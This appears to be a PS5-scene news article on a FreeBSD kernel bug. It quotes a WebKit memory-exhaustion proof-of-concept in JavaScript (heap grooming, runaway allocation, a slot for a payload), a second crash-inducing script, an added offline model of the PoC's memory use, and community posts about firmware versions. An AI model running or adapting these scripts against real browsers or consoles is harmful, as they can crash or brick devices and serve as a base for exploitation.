Recently @zecoxao shared via an X post a FreeBSD kernel bug security advisory, confirming that the PlayStation 5 vulnerability works; it arrived alongside a WebKit memory leak proof-of-concept (PoC) test page for all WebKit browsers (PS4 / PS5, including Safari) by Debv on GitHub, aka idebty on X (DebTy's Ko-fi page). Kameleonre_ on X notes the kernel bug has since been fixed (CVE-2024-43102).
From the GitHub repository's README.md:
Memory Leak
Author: idebty
I'm self-taught and I don't know anyone in the community. If you want to use this, use it, but credit me.
WebKit Memory Leak PoC
Description
This Proof of Concept (PoC) demonstrates a WebKit memory exhaustion exploit that I have been working on. The current iteration works but still needs to be fully exploited. Below is the JavaScript code that shows how it operates, along with explanations of each step.
How it Works
The code below follows five key steps:
- Heap Initialization: Allocates memory in a controlled manner.
- Heap Grooming: Manipulates memory to create gaps for the exploit.
- Memory Exhaustion: Continuously allocates and clears memory to exhaust resources.
- Payload Execution: Executes the payload to perform memory corruption.
- Exploit Execution: Runs the steps in sequence to trigger the memory exhaustion.
Code:
// Step 1: Initialize Controlled Memory
function initializeHeap() {
    //alert("Int heap");
    let buffers = [];
    for (let i = 0; i < 2048; i++) { // Reduced allocations
        buffers.push(new ArrayBuffer(500000)); // Smaller blocks of memory
    }
    return buffers;
}

// Step 2: Groom the Heap
function groomHeap() {
    //alert("groom heap");
    let tempArray = [];
    // Allocate and deallocate in patterns
    for (let i = 0; i < 2048; i++) { // Reduced iterations
        let buffer = new ArrayBuffer(1000); // Allocate smaller blocks
        tempArray.push(buffer);
    }
    // Deallocate some of the buffers to create holes in the heap
    for (let i = 0; i < 1512; i++) { // Fewer deallocations
        tempArray[i] = null; // Free up space to create holes in the heap
    }
    return tempArray;
}

// Step 3: Memory Exhaustion Function
function memExh() {
    let bufferArray = [];
    for (let i = 0; i < 2048; i++) { // Reduced iterations
        bufferArray.push(new ArrayBuffer(900000)); // Allocate smaller buffers
        if (bufferArray.length > 512) { // Less aggressive clearing
            bufferArray = []; // Clear buffer array to exhaust memory
        }
    }
}

// Step 4: The Exploit Payload Function
function payload() {
    let largeString = "B".repeat(900000); // Smaller initial string
    let obj = {};
    let iterationCount = 0; // Counter to track number of iterations
    while (true) {
        // String concatenation
        largeString += largeString;
        if (largeString.length > 100000000) { // Lower threshold for reset
            largeString = "B".repeat(900000); // Reset string to avoid overflow
        }
        memExh();
        iterationCount++;
        if (iterationCount > 64) break; // Control the number of iterations
    }
}

// Step 5: Perform the Exploit
function performExploit() {
    let controlledBuffers = initializeHeap(); // Initialize the heap
    let groomedHeap = groomHeap(); // Groom the heap
    // Start memory corruption
    memExh();
    // Run the payload
    payload();
}

performExploit();
## Instructions
- Copy the above code and run it on an exploitable PS5 (works until, I guess, 9.60?). This might not be useful on PS4.
- Be mindful that this is a PoC and should be used for educational purposes only.
- Further testing is required to fully understand this vulnerability.
- Place Your Payload in the payload function
This PoC is for educational purposes only. The author is not responsible for any misuse of this code.
I'M NOT LIABLE FOR ANY DAMAGES CAUSED BY THIS POC OR ANY OTHER USE OF IT. THIS CAN BRICK AND MIGHT BRICK YOUR SYSTEM IF LEFT UNEDITED.
A Message to Sony
Sony, I have reported this and got dismissed, and I have provided enough proof, plus that unreleased PoC. It's not my fault that even after 6 months you didn't fix it. I have given you more than enough to fix this; this is to hopefully encourage you to fix it.
Heap Memory Exploit Code
Code:
function memmexh() {
    // Simulate allocation of an object
    let obj = { data: "important data" };
    // Reference to the object
    let ref = obj;
    // Simulate freeing the object
    obj = null;
}

function ComplexOverflow() {
    let largeString = "A".repeat(1000000); // 1 million A's
    let bufferArray = [];
    let nestedArray = [];
    let obj = {};
    let counter = 0;
    let counterr = 0;
    while (true) {
        // String concatenation
        largeString += largeString;
        if (largeString.length > 100000000) {
            largeString = "A".repeat(1000000);
        }
        // Array buffer allocation
        bufferArray.push(new ArrayBuffer(1000000));
        if (bufferArray.length > 1000) {
            bufferArray = [];
        }
        // Nested arrays
        nestedArray.push([]);
        if (nestedArray.length > 1000) {
            nestedArray = [];
        }
        counterr++;
        if (counterr >= 100) {
            location.reload();
        }
        // Object property expansion
        obj[counter] = "A".repeat(1000);
        counter++;
        if (counter > 10000000) {
            obj = {};
            counter = 0;
        }
    }
}

let MTestClassesArray = [];
class MTestClass {
    constructor() {}
}

const create_1000_objects = () => {
    let counter = 0;
    memmexh();
    while (true) {
        // Simulate allocation of an object
        let obj = { data: "important data" };
        // Reference to the object
        let ref = obj;
        counter++;
        if (counter >= 500) {
            location.reload();
        }
        for (let i = 0; i < 1000; i++) {
            MTestClassesArray.push(new MTestClass());
        }
        const text = `Total ${MTestClassesArray.length} MTestClass objects created`;
        document.getElementById('divMsg').innerHTML = text;
    }
}
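Before running a memory-exhaustion PoC on a console, a practitioner usually wants to know how much it actually commits at once. The following is an added bookkeeping model of the five-step PoC quoted above; it is not code from the repository or its author. It records the sizes the PoC requests instead of allocating them, so the peak live footprint of each step can be computed on any machine. The buffer counts and sizes are copied from the README code; the 2 bytes per UTF-16 code unit used for the strings is an assumption about the engine, not something the PoC states.

```javascript
// Added example (not from the PoC repository): a bookkeeping model of the
// five-step PoC. Nothing here allocates real buffers; it only tracks the
// sizes requested so the live footprint can be computed offline.
// Assumption: strings cost 2 bytes per UTF-16 code unit (engine-dependent).

class AllocationTracker {
  constructor() {
    this.live = 0;   // bytes currently reachable
    this.peak = 0;   // highest value of live seen so far
    this.total = 0;  // bytes requested over the whole run
    this.count = 0;  // number of allocation requests
  }
  alloc(bytes) {
    const handle = { bytes, freed: false };
    this.live += bytes;
    this.total += bytes;
    this.count += 1;
    if (this.live > this.peak) this.peak = this.live;
    return handle;
  }
  release(handle) {
    if (handle && !handle.freed) {
      handle.freed = true;
      this.live -= handle.bytes;
    }
  }
  releaseAll(handles) {
    for (const h of handles) this.release(h);
  }
}

// Step 1: 2048 buffers of 500000 bytes; the caller keeps the array, so they stay live.
function modelInitializeHeap(t) {
  const buffers = [];
  for (let i = 0; i < 2048; i++) buffers.push(t.alloc(500000));
  return buffers;
}

// Step 2: 2048 buffers of 1000 bytes, the first 1512 of which are dropped.
function modelGroomHeap(t) {
  const temp = [];
  for (let i = 0; i < 2048; i++) temp.push(t.alloc(1000));
  for (let i = 0; i < 1512; i++) {
    t.release(temp[i]);
    temp[i] = null;
  }
  return temp;
}

// Step 3: 2048 buffers of 900000 bytes; the array is dropped once it holds 513.
// Dropping the array only makes the buffers unreachable. The model counts them
// as freed at that moment, the earliest point a garbage collector could reclaim them.
function modelMemExh(t) {
  let arr = [];
  for (let i = 0; i < 2048; i++) {
    arr.push(t.alloc(900000));
    if (arr.length > 512) {
      t.releaseAll(arr);
      arr = [];
    }
  }
  t.releaseAll(arr); // the remainder goes out of scope when the function returns
}

// Step 4: the string doubles each iteration and resets above 100000000 code units.
// Concatenation briefly keeps both the old and the new string alive.
function modelPayload(t) {
  let len = 900000;
  let str = t.alloc(len * 2);
  let iterations = 0;
  while (true) {
    const doubled = t.alloc(len * 2 * 2);
    t.release(str);
    str = doubled;
    len *= 2;
    if (len > 100000000) {
      t.release(str);
      len = 900000;
      str = t.alloc(len * 2);
    }
    modelMemExh(t);
    iterations += 1;
    if (iterations > 64) break;
  }
  t.release(str);
  return iterations;
}

// Step 5: run the steps in the PoC's order and report the footprint.
function modelPerformExploit() {
  const t = new AllocationTracker();
  const controlled = modelInitializeHeap(t);
  const afterInit = t.live;
  const groomed = modelGroomHeap(t);
  const afterGroom = t.live;
  modelMemExh(t);
  const iterations = modelPayload(t);
  // The real PoC keeps controlled/groomed alive until the page is torn down.
  t.releaseAll(controlled);
  t.releaseAll(groomed.filter(Boolean));
  return { afterInit, afterGroom, iterations, peak: t.peak, total: t.total, count: t.count, leftover: t.live };
}
```

modelPerformExploit() reports a peak of 1,601,436,000 bytes: about 1.02 GB held by step 1 for the entire run, plus the 513 × 900000-byte window of step 3 and the 57.6-million-unit string of step 4 live at the same moment. The roughly 122 GB that step 3 churns through over its 66 calls is only ever reclaimable because the array is dropped; whether the collector actually runs before the process hits its memory limit is up to the engine, which is the part this model does not capture and the part that decides whether the PoC crashes the tab or merely stalls it.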
Kameleonre_ on X notes, "OK, the bugged code is not on FreeBSD 9.0, which means it's not valid for PS4... but it's on PS5... thanks to SiSTR0 and iMrDJAi for pointing it out... this is the C code on FreeBSD 9.0. Bug not there..." further stating, "But it's on the FreeBSD 11 branch [PS5]; this is the line which contains the bug."
According to notnotzecoxao on X, "also my friend said this should work on 1.xx and 2.xx as well as up until some of the most recent fws," while @CrazyVoid asks in an X post, "why does he not release his impl of the kernel bug? instead of making people recreate the work over again" as CrazyVoidPS4 then admits, "to be fair, specter enjoys working on things like that I think."
Shortly afterwards, idebty stated, "Someone modified my code, idk what he did, but he just made it trigger an error every time; it's a system error at that. It seems like he's trying to make it copy a payload.bin. This might be a first for Sony: an exploit that releases for the latest firmware," with @SeregonWar on GitHub responding in an X post, "Hi! I am the creator of the fork! I don't know if the changes I made will work; I am trying to exploit the vulnerability somehow. Thanks for your work in finding the vulnerability!"
Update: @zecoxao announced via an X post, "confirmed by @flatz that 8.00 patches this bug," going on to clarify, "the kernel bug, I might add," and then further elaborating, "to everyone that did not understand flatz's words: it's likely that sony never intended to fix this bug, and accidentally 'fixed' it on 8.00 by patching syscall and libkernel access from the main contenders such as bluray java, webkit and ps2 games."
This PS5Scene news follows the PS5 IPV6 Kernel Exploit v1.03 and its subsequent updates, the PS4 v10.00-11.02 & PS5 v6.00-8.60 PoC Test, TheFlow0's recent HackerOne bug report, the PS4 / PS5 Semi-Permanent Exploits (WIP), the PS5 Pro Tech Presentation by Mark Cerny and Sony's official PS5 Pro launch date announcement.